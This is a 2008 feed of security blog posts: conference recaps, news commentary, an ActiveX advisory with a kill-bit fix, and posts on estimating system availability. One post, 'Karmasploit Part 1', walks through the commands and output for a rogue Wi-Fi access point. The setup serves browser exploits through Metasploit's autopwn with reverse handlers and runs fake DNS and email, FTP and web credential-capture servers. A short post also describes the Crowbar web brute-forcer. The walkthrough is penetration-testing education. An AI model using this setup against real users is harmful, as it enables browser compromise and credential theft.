Monday, August 18, 2008

Spliced feed for Security Bloggers Network

Air Force Cyber Command halted…? [SecuraBit]

Posted: 18 Aug 2008 07:10 AM CDT

So the Air Force, which prides itself on being the most technical branch of all the armed forces, has decided to suspend its efforts to build its new Cyber Command. Not sure if any of you recall the recent AF recruitment commercials geared around cyber security, but it would be safe to say that [...]


SANS Mentor SEC 504 in Long Island, NY [Kees Leune]

Posted: 17 Aug 2008 07:31 PM CDT

SANS courses have a reputation for being the best vendor-neutral technical security training available at the moment. I am pleased to announce that I have recently joined the SANS Mentor program and am currently preparing to host a SEC 504 Hacker Techniques, Exploits & Incident Handling class. The class prepares attendees for the GIAC Certified Incident Handler (GCIH) certification.

We are currently looking at starting the class somewhere around Christmas. Mentor classes run for 10 consecutive weeks, two hours a week, usually in the early evening.

If you are interested in taking the class through the Mentor program, and if you are able (and willing) to travel to Long Island (NY) to take the class, please let me know.

Exact dates and times have not yet been determined, so I can work with you on that aspect. For now, we are looking at holding the classes in Garden City or in Hauppauge.

Defcon [Kees Leune]

Posted: 17 Aug 2008 05:44 PM CDT

Defcon was awesome.

I got to meet a whole lot of people I had wanted to say hello to, and a whole bunch of people I had never heard of but enjoyed hanging out with, and I was unable to hook up with some people I had really wanted to see. Oh well, there is always next year!

I'm not going into much detail; if you were there, you know what it was like, and if you weren't, I don't think I could convey the Con as a whole. This picture captures it fairly well, though ;)

[image: sheep.jpg]


DAVIX 1.0.1 Released [Security Data Visualization]

Posted: 17 Aug 2008 12:44 PM CDT

After months of building and testing, the long-anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exciting moment for us, and we are curious to see how the product is received by the audience. So far the ISO image has been downloaded at least 600 times from our main distribution server; downloads from the mirrors are not counted.

All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage.

We wish you happy visualizing!

Kind regards
Jan

An Exploit That Targets Developers [Sunnet Beskerming Security Advisories]

Posted: 17 Aug 2008 11:00 AM CDT

Toward the end of last week, a vulnerability affecting Microsoft's Visual Studio was identified in the wild, though it isn't known just how widespread the attacks are at this stage.

While the mechanism of the vulnerability (an ActiveX control buffer overflow leading to remote code execution) isn't exactly new, it is the target, and the fact that it is being actively attacked, that makes it somewhat interesting.

In the past there have been proof of concept and limited release vulnerabilities targeting developers, reverse engineers, forensic analysts, and a range of other service providers. What hasn't really happened with any of the previous examples is a move to exploitation in the wild.

Developers who are not able to separate their development environment from the Internet, and who use their development systems to surf the web, are at greatest risk from this particular exploit. With the increasing availability of high-quality online development libraries and code samples, it is becoming rarer for developers to maintain a clear separation between the two, so the vulnerable user base is actually quite a high proportion of the total number of Visual Studio installations.

If you have Visual Studio 6 installed and want to be protected against the vulnerability in the Msmask32.ocx ActiveX control, either install version 6.0.84.18 (the issue is reported to be fixed in that version) or set the kill bit for the following CLSID in the Registry: {C932BA85-4374-101B-A56C-00AA003668DC}.
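
If you'd rather script the kill bit than edit the Registry by hand, something along these lines should work from an administrative command prompt (the 0x400 value of Compatibility Flags is the standard kill-bit flag; as always, back up the key before changing it):

reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C932BA85-4374-101B-A56C-00AA003668DC}" /v "Compatibility Flags" /t REG_DWORD /d 0x00000400 /f

Internet Explorer will then refuse to instantiate the control, regardless of which application shipped it.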

Spamtastic? Nope, SPAMTACULAR [Vitalsecurity.org - A Revolution is the Solution]

Posted: 17 Aug 2008 10:57 AM CDT



.....and just when you think it can't get any stupider, HERE COMES CHRISTMAS:

The Super Duper Late Edition of The Spywareguide Roundup [Vitalsecurity.org - A Revolution is the Solution]

Posted: 17 Aug 2008 10:48 AM CDT



....oh, all sorts of things, WTF Cat!

For example, this past week we've seen....

* Automated Spim on Microblogging Site Via MSN Messenger - I thought this was a clever way of zinging out automated spim on sites similar to Twitter. Naughty, naughty spammers.

* CNN Spam - There's been all sorts of spam shenanigans going on this past week or so, hasn't there? [1], [2]

* Marketing Bot Allows Insertion of Custom Facebook Feed Messages - I think this is a very bad idea.

* Spamblogs Pushing Rogue Antivirus Programs - Nothing Earth-shaking, but always worth keeping an eye on this kind of thing.

* Trust No One? - An interesting email that's either legit, fake, or somewhere in between. I'm going to be digging into this one a bit more, hopefully.

* A Dark Knight for Zango - A three part wing-dinger, with thrills, spills and chills!

Also, pirate movies.

Anyway, that's it for this week! If I'm late with the roundup again, may WTF Cat beat me soundly with a wet kipper.

Metasploit + Karma=Karmasploit Part 1 [Carnal0wnage Blog]

Posted: 16 Aug 2008 11:38 PM CDT

HD Moore released some documentation to get karmasploit working with the framework.

First you'll have to get an updated version of aircrack-ng, because you'll need airbase-ng. I had 0.9.1, so I had to download and install the current stable version (1.0-rc1). If you had an old version installed, you should be good dependency-wise. Ah, but there is a patch (I used the 2nd patch), so apply that before you make / make install.
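
The build dance is roughly the usual one; the tarball and patch filenames below are illustrative, so substitute whatever you actually downloaded:

wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz
tar xzf aircrack-ng-1.0-rc1.tar.gz
cd aircrack-ng-1.0-rc1
patch -p1 < airbase-ng.patch   # the 2nd patch mentioned above; name is illustrative
make
make install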

You may also need a current version of the madwifi drivers (I used 0.9.4). I had recently updated my kernel, which hosed all my madwifi stuff, so I had to reinstall. OK: so you've got an updated version of aircrack, a patched airbase-ng, and madwifi drivers, and you can inject packets? Let's continue.

Let's do our aireplay-ng test to see if things are working:

root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...
19:55:44 Injection is working!
19:55:46 Found 5 APs
19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
19:55:52 0/30: 0%
19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%
19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
19:56:03 5/30: 16%
19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
19:56:09 0/30: 0%
19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%

Looks like we are good.

Now just follow the steps in the documentation: I installed dhcpd3 and set up my conf file, did an svn update on the Metasploit trunk, made sure the sqlite3 stuff was working, and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.
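
For reference, a minimal /etc/dhcp3/dhcpd.conf for the at0 network could look something like the sketch below; the 172.16.1.0/24 addressing matches the interface configuration further down, but the range and lease times are just placeholder values:

ddns-update-style none;
authoritative;
default-lease-time 60;
max-lease-time 72;
subnet 172.16.1.0 netmask 255.255.255.0 {
  range 172.16.1.100 172.16.1.200;
  option routers 172.16.1.207;
  option domain-name-servers 172.16.1.207;
}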

With all the config files set up, it's pretty easy to get things going.

root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet"
**You get the idea...


airbase-ng creates an at0 tap interface, so you have to configure it and set the MTU size (all of this is from the karmasploit documentation):

root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0

root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400

root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800

After we get our IP stuff straight, we need to tell the dhcpd server which interface to hand out IPs on:

root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net


After that, we run our karma.rc file with msfconsole:

root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc

       =[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 79 aux


resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 5353
SRVPORT => 5353
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 53
SRVPORT => 53
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >


In the next post we'll see karmasploit in action.

Defcon Thoughts [Carnal0wnage Blog]

Posted: 16 Aug 2008 11:32 PM CDT

Everyone else (g0ne, ncircle, terminal23) is posting their thoughts on Defcon, so I figured I would too. I've been waiting on a couple of people to actually post the code they talked about, but I'm growing impatient, and I guess I can use the release for other posts.

Let's start with the Cons:
-The Badges...oops, that sucked...at least not getting one when I first paid; the blinky lights were cool, though. At least mine worked this year.
-The Stench...oops, that stunk...like rotting-corpse bad.
-The Goons...hmmm, what to say...I know you have a tough job with crowd control and whatnot, but do you really have to talk to everyone like they are assholes? I'm not sure you have a reason to be screaming at 11am on Friday morning; save that shit for Sunday.
-The Crowds...sucked...that narrow-ass hallway combined with the stench = no fun.
-The Talks...I didn't care for most of the talks (maybe I just picked badly); of course there were a few good ones, and props to everyone who submitted a paper and stood up there in front of a ton of people. I think the boss is convinced to do BH next year; everyone I talked to who went to BH was pleased with the talks.

The Pros:
-The Parties...303, hackerpimps, securabit/i-hacker, offensive computing, freakshow, i-sight, core impact, etc
-The People...not the crowds, but getting to meet in person the people I talk to online all the time...regrets: not making it to the Security Twits meetup.
-The CTF...I had people explain to me a little better than last year what the hell is actually going on. Pretty interesting.
-The Guitar Hero competition...fun!
-The Swag...my green/black Defcon coffee cup rulez.
-The Twitter(ing)...very cool to watch the twits in real time during talks...MVP to jjx for the most tweets, or twits, or whatever they are called.

I'll do a separate post on the talks I thought stood out at Defcon.

Crash Course In Penetration Testing Workshop at Toorcon [Carnal0wnage Blog]

Posted: 15 Aug 2008 08:15 PM CDT

Joe and I will be conducting our Crash Course In Penetration Testing Workshop at Toorcon in September.

http://sandiego.toorcon.org/content/section/4/8/

Description

Instructors: Joseph McCray & Chris Gates
Includes: 250GB 2.5" USB hard drive preloaded with lab VMware images

This course will cover some of the newer aspects of pen-testing, including: open source intelligence gathering with Maltego and other open source tools; scanning; enumeration; exploitation (both remote and client-side); and post-exploitation, relying heavily on the features included in the Metasploit Framework. We'll discuss our activities from both the whitebox and blackbox approaches, keeping stealth in mind for our blackbox activities.

Web application penetration testing will be covered as well, with a focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL injection.

The course comes with a complimentary USB hard drive loaded with the lab virtual machine images for you to play with, so you can continue to hone your skills and learn new techniques even after the course is finished. Attendees will walk away with current knowledge of how to pen-test both a network and a web application, all of the basic tools needed, and a set of practice exercises they can use to improve their skills.

SecViz got a new Logo [Security Data Visualization]

Posted: 15 Aug 2008 04:24 PM CDT

Have you noticed? There is a new logo for secviz.org. To be precise, it is the first real logo; what was there before wasn't really a logo.



The Daily Incite - August 15, 2008 [Security Incite Rants]

Posted: 15 Aug 2008 08:27 AM CDT

Today's Daily Incite

August 15, 2008 - Volume 3, #69

Good Morning:
I know I harp on the importance of managing expectations frequently, mostly because I keep seeing data points everywhere that reinforce the point. As I continue to binge on the Olympics, the concept keeps resonating. The US Men's Gymnastics team got a Bronze. It was very unexpected, given the injuries to the Hamm brothers, so they are ecstatic. Yet the women's team was disappointed with Silver. Why? Expectations. The girls thought they could win after two rotations.
Get ready to see the NY Bretts!
Even the magical Michael Phelps was pissed off after the 100m butterfly. He won Gold and set a world record, and he was still pissed. It turned out his goggles were leaking, so he was swimming blind. And he still expected to swim faster. Again, expectations.

Now it's time for the NFL season to start. I'm taking the boy to the opening pre-season Falcons game on Saturday, exercising my new season tickets. It's very exciting, even though I expect the Falcons to suck this year. I just love to watch football, even if it's not the NY Giants.

Matt Ryan is poised to step in as the starter and future of the franchise sometime over the season. This year, the expectations are low. Over time, they won't be. But he should enjoy the fact that he can learn this year and not really be raked over the coals when the Falcons make some dumb mistakes and lose some games. It's all about managing expectations.

Brett Favre, meanwhile, is in exactly the opposite position. The NY Jets want him to come in and have an immediate impact. He's got little wiggle room to learn the system and to be the hyper-aggressive Favre who ends up making as many mistakes as great plays. It's not like NY is a forgiving place; I'm sure the crazy New Yorkers will be jumping on Eli when he throws an INT or 10. Super Bowl ring or not, it's always about what you have done lately.

The good news is that you probably don't have millions of fans hanging on your every move. That takes off the immediate pressure and ensures you likely won't be tabloid fodder, but that doesn't mean you shouldn't always be paying attention to expectations. You need to. If you do it wrong, you are certain to disappoint people. If you do it right, you are a super-star. Even if you accomplish exactly the same thing. 

Have a great weekend. And meet those expectations.

Photo: "BRETTS" originally uploaded by nationalparodyleague


Top Security News

Don't hold your breath for the demise of passwords
So what? - I've been in this game for a long time, and almost as long as I've been in it, people have been calling for the end of passwords. There have been lots of "contenders" positioning to replace the good old-fashioned password. It still hasn't happened, and I don't expect it to happen anytime soon. This latest discussion by SJSU professor Randall Stross talks about the fact that passwords aren't secure. It's all stuff we've heard before. Widespread use of strong authentication techniques is cost-prohibitive and doesn't solve the problems of identity theft or phishing. Personally, I try to eliminate the issues I know can get me, like a dictionary attack. So I use strong passwords with a password manager (I use 1Password) to eliminate the complexity; RoboForm is pretty well regarded on the Windows side. Will a strong password stop a well-crafted XSS, MITM or CSRF attack? Nope. But it will stop some basic attacks, and I think over time the data has shown that it tends to be the basic ones that are most successful.
Link to this

Reducing the Fed's attack surface
So what? - Evidently the US Feds have been watching the Weakest Link and figured out that maybe it was a bad idea to have 8,000 different connections to the Internet. The initiative is called Trusted Internet Connection (TIC). Clearly, the more connections, the more places to screw up a configuration and leave a hole. So this idea of reducing the number of connections to about 100 is kind of interesting, but I'm not sure it's feasible. Those would need to be some pretty big-ass pipes, and there is little room for error. Sure, you can throw a lot of money at monitoring and managed services and the like. But if you are wrong, the bad guys get access not just to a small section of the US Fed networks, but to large swathes of territory. It's also interesting that the pendulum is swinging back to private networks. It wasn't too long ago that it was all about moving away from private packet services and using branch-to-branch VPNs to cheapen transport. Now I guess it'll swing back to connecting sites via private network backbones and aggregating the access to only a few points. What's old is new again, though it's funny we are pulling out the bell bottoms of networking due to a security issue.
Link to this

7 years later we're thinking about TLD contingencies
So what? - How the Internet stays up with reasonable uptime continues to amaze me, especially when I hear about initiatives like the Registry Failure Task Force, which was formed in 2001 and is just now starting to move forward with an architecture that would build a bit more resilience into the system. Nothing in how Larry Seltzer describes the plan seems too groundbreaking. You know, who should do what, and then whom they should tell. They even claim they are going to practice their response. Good luck with that. It's a great idea, and I'm pleased that the notion of containing the damage is alive and well among the folks who run the Internet. Ultimately, I doubt it'll be any of the current attack vectors that brings the Internet to its knees. But sooner or later something will emerge and we won't be ready; at least there will be a plan to recover. And that's about the best we can do.
Link to this


The Laundry List

  1. Clear sailing ahead. The TSA takes CLEAR out of the penalty box after the misplaced laptop incident. Now they are going to encrypt laptops. Imagine that. - BTNmag coverage
  2. More from the "I pulled numbers out of my ass" category, Aberdeen says best in class vulnerability and threat management yields 91% marginal ROI. Huh? What is marginal ROI? What is best in class anything? Who cares, I'm sure the vendors are happy. - Aberdeen release
  3. Security Innovation takes a page out of the TruSecure book. When you have a methodology that works, but no one knows what it is, just call it a "certification," give the customers a piece of paper, jack up the price twofold, and life is good. Fact is, having someone credible like SI say your software security program is up to snuff is a good thing, but the certification angle? Meh. - Security Innovation release
  4. Where is Lenin when you need him? Google announces the KeyCzar, for "simple and safe crypto." I don't think I've ever seen those three words (simple, safe, crypto) together in one sentence. Let's just hope developers don't start shooting off their feet with these safe and simple libraries. - Google Security Blog

Top Blog Postings

He blinded me with science....SCIENCE
Thomas Dolby lives, and not just as some wacky podcasting dude. The Mogull brings up a good point in his Dark Reading column about actually having some data regarding vulnerability disclosure. That would be novel. Right now it's very much a he-said, she-said activity. We think it's bad that HD published the DNS attack in Metasploit. But are we sure? Does security by obscurity work? And for how long? These are all very interesting questions, and a topic rife with dissension and opinion. Data would solve the problem; gathering the data, not so easy. Rich asks you to do a poll, and you should. Is that data? Nope, it's opinion. "Were you hurt or helped" is getting at people's opinions. There are enough folks tracking enough exploits that I think there is probably enough data out there to start drawing some conclusions. But getting there will require a significant amount of sharing and cooperation, which isn't necessarily the strong suit of the security industry.
http://www.darkreading.com/document.asp?doc_id=160415
Link to this

Ding dong, SIM is dead? Yeah, not so much...
I wish everyone would just remember that the security business is like Night of the Living Dead. We can never kill anything off; it just hangs out in the cemetery until some desperate producer decides to roll another zombie movie. So Raffy's first post, that SIM is dead, was really kind of ridiculous. Thankfully he saw fit to clarify what he's saying in this post, which is SIM is dead - unless... My opinion is that the first generation of SIM didn't do what it needed to: it was too hard, too expensive, and took too long to show value. There are lots of folks working on those issues. Of course, we still aren't there yet, but the industry is making progress. And the biggest reason I don't see the idea of SIM dying (although the implementation will clearly change and evolve) is because CUSTOMERS NEED IT. Unless someone comes up with some magic fairy dust that all of a sudden tells users what's going on with their systems and what they should be focusing on RIGHT NOW, we need security management capabilities. But anytime you pronounce something dead it generates lots of page views, eh?
http://blogs.splunk.com/raffy/2008/07/18/sim-is-dead-unless/
Link to this

Let's start the hype engine for 2009
Stuart King works for a conference producer (amongst the many other things his employer does), so obviously the folks on the "product" side of the house can and should consult him about what's hot in security. I guess it is getting towards the end of 2008, which means we all have to start thinking about topics for 2009. Great. For the fifth year in a row, I suspect the coming year will be very much like the last one. We are still bailing out the leaky boat with a small cup. Sure, there are new and different attack vectors. And things like "the cloud" are causing us to revisit our general security architectures. And compliance certainly isn't going away as a key issue for security folks everywhere. BUT maybe in 2009 we can start actually implementing the stuff we bought in 2006 and making sure we are more effectively doing the blocking and tackling that we all know could use some improvement. Alas, that isn't too sexy for a conference producer. Do you wonder why most of these folks don't ask my opinion?
http://www.computerweekly.com/blogs/stuart_king/2008/08/2009securitypredictions.html
Link to this

Crowbar 0.941 [extern blog SensePost;]

Posted: 15 Aug 2008 08:25 AM CDT

A quick update on your favourite brute forcer... The file-input "MS EOF char" issue has been resolved, and provision has been made for blank passwords too. The above-mentioned error meant that Crowbar incorrectly used EOF characters on *nix-based files.

Regarding blank passwords: simply include the word "[blank]" (without the quotes) in your brute-force file, and Crowbar will test for blank usernames/passwords as well.
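
For example, a brute-force input file that tries two ordinary guesses plus the empty password might look like this (the first two entries are arbitrary):

admin
password1
[blank]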

For those of you that don't know, Crowbar is a generic brute force tool used for web applications. It's free, it's light-weight, it's fast, it's kewl :>

Get it at http://www.sensepost.com/research/crowbar/

frankieg

SecuraBit Episode 8 [SecuraBit]

Posted: 15 Aug 2008 06:01 AM CDT

On this episode of SecuraBit (available here!): back from a three-week hiatus! Defcon and BlackHat; notable Defcon parties Jay and Chris attended: Core Impact, EthicalHacker.net, Cisco, Isight, I-hacked, StillSecure and IOActive, Freakshow. Special thanks to all who let us drink for free; hopefully you got a cool SecuraBit T-shirt out of it! ChicagoCon: Boot Camps: Oct 27 - 31, Conference: [...]



Estimating Availability of Simple Systems - Non-redundant [Last In - First Out]

Posted: 14 Aug 2008 11:02 PM CDT

 

In the introductory post to this series, I outlined the basics of estimating the availability of simple systems. This post picks up where that one left off and looks at availability estimates for non-redundant systems.

Let's go back to the failure estimate chart from the introductory post:

Component         Failures per Year  Hours to Recover  Hours Failed per Year
WAN Link          0.5                8                 4.0
Routers, Devices  0.2                4                 0.8
SAN Fabric        0.2                4                 0.8
SAN LUN           0.1                12                0.12
Server            0.5                8                 4.0
Power/Cooling     1.0                2                 2.0

And apply it to a simple stack of three non-redundant devices in series.

[image: availability-misc]

Assuming the devices are all 'boot from flash, no hard drive' devices, we apply the estimated failures per year and hours to recover from the Routers/Devices row of the table to each device in the series. For series dependencies, where the availability of the stack depends on every device in the stack, simply adding the estimated failure hours together gives us an estimate for the entire stack.

For each device:

.2 failures/year * 4 hours to recover = .8 hours/year unavailability.

For three devices in series, each with approximately the same failure rate and recovery time, the unavailability estimate is the sum of the unavailability of each component: .8 + .8 + .8 = 2.4 hours/year.
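
If you'd rather let a script do the adding, here is a minimal sketch of the series calculation (the numbers are the Routers/Devices figures from the table above):

# series (non-redundant) downtime estimate: unavailability simply adds up
components = [
    ("device-1", 0.2, 4),  # (name, failures per year, hours to recover)
    ("device-2", 0.2, 4),
    ("device-3", 0.2, 4),
]

downtime = sum(rate * mttr for _, rate, mttr in components)
availability = 1 - downtime / (365 * 24)
print("downtime: %.1f hours/year" % downtime)         # 2.4
print("availability: %.4f%%" % (availability * 100))  # ~99.97%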

Notice a critical consideration: the more non-redundant devices you stack up in series, the lower your availability. (Notice I made that sentence bold and italic; I did that 'cause it's a really important concept.)
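
Written out (my notation, not from the original chart): for n components in series, A_series = A1 x A2 x ... x An; since each Ai = 1 - Ui with Ui small, this is approximately 1 - (U1 + U2 + ... + Un). That is why simply summing the per-component outage hours works, and why every extra series component drags the total down.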

Non-redundant series dependencies also apply to other interesting places in a technology stack. For example, if I want my really big server to go faster, I add more memory modules so that the memory bus can stripe memory access across more modules and spend less time waiting. Those memory modules are effectively serial and non-redundant. So for a fast server, we'd rather have 16 x 1GB DIMMs than 8 x 2GB DIMMs or 4 x 4GB DIMMs. The server with 16 x 1GB DIMMs will likely go faster than the server with 4 x 4GB DIMMs, but it will be four times as likely to have a memory failure.

Let's look at a more interesting application stack, again a series of non-redundant components.

We'll assume this is a T1 from a provider, a router, a firewall, a switch, an application/web server, a database server, and an attached RAID array. The green path shows the dependencies for a successful user experience. The availability calculation is a simple sum of the products of failure frequency and recovery time for each component.

[image: application-nonredundant]

Component        Failures per Year  Hours to Recover  Hours Failed per Year
WAN Link         0.5                8                 4.0
Router           0.2                4                 0.8
Firewall         0.2                4                 0.8
Switch           0.1                12                0.12
Web Server       0.5                8                 4.0
Database Server  0.5                8                 4.0
RAID Array       0.1                12                0.12
Power/Cooling    1.0                2                 2.0
Total                                                 15.8 hours

The estimate for this simple example works out to about 16 hours of downtime per year, not including any application issues like performance problems or scalability limits.

  • The estimate also doesn't consider the human factor.
  • Because the numbers we put into the chart are rough, with plenty of room for error, the final estimate is also just a guesstimate.
  • The estimate is the average hours of outage over a number of years, not the number of hours of outage in each year. You could see considerable variation from year to year.

Applying the Estimate to the Real World

To apply this to the real world and estimate an availability number for the entire application, you'd have to know more about the application, the organization, and the persons managing the systems.

For example, assume that the application is secure and well written, that there are no scalability issues, and that the application has version control, test, dev and QA implementations, and a rigorous change management process. That application might suffer few if any application-related outages in a typical year; figure one bad deployment per year that causes two hours of downtime. On the other hand, assume that it is poorly designed, that there is no source code control or structured deployment methodology, no test/QA/dev environments, and no change control. I've seen applications like that have a couple of hours a week of downtime.

And if you consider the human factor, that the humans in the loop (the keyboard-chair interface) will eventually misconfigure a device, reboot the wrong server, or fail to complete a change within the change window, then you need to pad this number to take the humans into consideration.

On to Part Two (or back to the Introduction?)

Estimating Availability of Simple Systems - Redundant [Last In - First Out]

Posted: 14 Aug 2008 11:02 PM CDT

 
This is a continuation of a series of posts that attempt to provide the basics of estimating the availability of various simple systems. The introduction covered the fundamentals, and Part One covered estimating the availability of non-redundant systems. This post attempts to cover simple redundant systems.
 
Let's go back to the failure estimate chart from the introductory post, but this time modify it for active/passive redundancy. Remember that for redundant components the number of failures is the same (the MTBF doesn't change), but the time to recover (MTTR) is shortened dramatically: the MTTR is no longer the time it takes to determine the cause of the failure and replace the failed part, but rather the time it takes to fail over to the redundant component.
 
Component         Failures per Year  Hours to Recover (component)  Hours to Failover (redundant)  Hours Failed per Year
WAN Link          0.5                8                             0.05                           0.025
Routers, Devices  0.2                4                             0.05                           0.01
SAN Fabric        0.2                4                             0.01                           0.002
SAN LUN           0.1                12                            0.12                           0.12
Server            0.5                8                             0.05                           0.025
Power/Cooling     0.2                2                             0                              0
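
To see what that buys you, take the WAN link row as a worked example: at 0.5 failures per year, the non-redundant estimate is 0.5 x 8 hours = 4 hours of downtime per year, while the redundant estimate is 0.5 x 0.05 hours (a three-minute failover) = 0.025 hours, roughly a minute and a half per year, a 160-fold improvement.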

Notice the nice small numbers in the far-right column. Redundant systems tend to do a nice job of reducing MTTR.

